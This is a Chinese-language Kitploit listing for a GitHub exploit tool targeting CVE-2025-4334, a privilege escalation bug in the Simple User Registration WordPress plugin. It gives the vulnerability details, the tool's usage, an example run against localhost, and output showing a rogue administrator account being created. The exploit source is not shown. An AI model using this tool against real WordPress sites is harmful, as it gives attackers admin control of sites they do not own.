Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4334 — Simple User Registration <= 6.3 - 未认证权限提升 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-4334
权限提升漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - 未认证权限提升

查看仓库
731年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔓 Simple User Registration <= 6.3 - 未认证权限提升

📄 描述

Simple User Registration WordPress 插件在所有版本(截至并包括 6.3 版本)中均存在权限提升漏洞。
这是由于注册期间可提供的用户元数据值限制不足所致。
这使得未认证攻击者能够注册为管理员。


🛡️ 漏洞详情

  • 类型: 不当权限管理
  • CVE: CVE-2025-4334
  • CVSS 评分: 9.8(严重)
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 公开发布时间: 2025年6月25日
  • 最后更新: 2025年6月26日

🛠️ 利用脚本

该脚本通过使用提取的 nonce、表单 ID 和 referer 提交表单,自动执行权限提升。

⚙️ 使用方法

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 URL 说明

  • -u → WordPress 基础安装地址(例如 http://localhost/wordpress/)
  • --form → 包含存在漏洞的注册表单的完整 URL(例如 http://localhost/wpr/default-registration/)

🧪 示例

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ 结果

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ 免责声明

此脚本仅用于教育和研究目的。
作者对使用此工具造成的任何滥用或损害概不负责。


作者:Khaled_alenazi (Nxploited)

下载工具